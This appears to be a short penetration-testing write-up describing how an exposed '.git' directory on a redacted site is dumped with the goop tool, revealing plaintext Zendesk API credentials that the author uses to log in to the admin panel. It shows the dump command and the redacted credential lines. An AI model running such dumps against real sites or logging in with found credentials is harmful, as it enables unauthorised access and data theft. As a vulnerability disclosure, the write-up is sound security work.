How a ‘.git’ file Leads to Zendesk Panel Takeover
بِسْمِ اللَّهِ الرَّحْمَـٰنِ الرَّحِيمِ
Greetings, hackers! In my recent Pentest Engagement at BugSwagger, join me as I discovered the ‘.git’ path that let me take over the Zendesk panel of the admin.
Introduction
This short writeup highlights a critical vulnerability discovered in a git repository. The vulnerability allows unauthorized actors to retrieve the entire source codebase using a simple command and have full access to the Zendesk Panel.
Using the command below we can dump the .git
file using the goop tool:
goop https://uat1-middleware.REDACTED.com/.git
The downloaded source code contains a file named: zendesk_functions.php
that house sensitive credentials in plain text :
define("ZENDESK_API_USERNAME", "REDEACTED@REDEACTED.com");
define("ZENDESK_API_PASSWORD", "REDEACTED_PASSWORD");
define("ZENDESK_API_URL", "https://yourcompany.zendesk.com/api/v2/tickets.json");
To confirm those credentials I go to https://www.zendesk.com/login/ to log in with those creds and as you can see below we have full admin panel access without any restrictions.